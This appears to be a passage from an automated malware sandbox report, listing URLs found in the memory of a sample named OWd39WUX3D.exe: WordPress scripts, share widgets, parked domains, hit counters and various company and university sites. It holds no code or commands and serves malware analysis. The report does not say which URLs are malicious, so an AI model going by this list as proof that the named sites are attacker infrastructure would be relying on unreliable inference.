              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26c380492a5e27db8a412ecddcdea59d
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.615816939.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s7.addthis.com/js/250/addthis_widget.js#pub=xa-4aeff0741d847c5f
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.615816939.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s7.addthis.com/static/btn/v2/lg-share-en.gif
              Source: svchost.exe, 00000015.00000002.679959004.0000000006F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vfcindia.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://wpa.qq.com/msgrd?v=3&uin=2938350997&site=qq&menu=yes
              Source: OWd39WUX3D.exe, 00000000.00000003.393078674.0000000006B7C000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393286215.0000000006B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.pupi.cz/?sub1=20230915-1526-1146-ae77-29f56f2b98ea
              Source: OWd39WUX3D.exe, 00000000.00000003.393078674.0000000006B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/h
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581365306.0000000004610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.NameBright.com
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/8173
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.615816939.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.addthis.com/bookmark.php?v=250&pub=xa-4aeff0741d847c5f
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.484231068.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.484231068.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.484231068.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.484231068.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.484231068.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bucea.edu.cn/
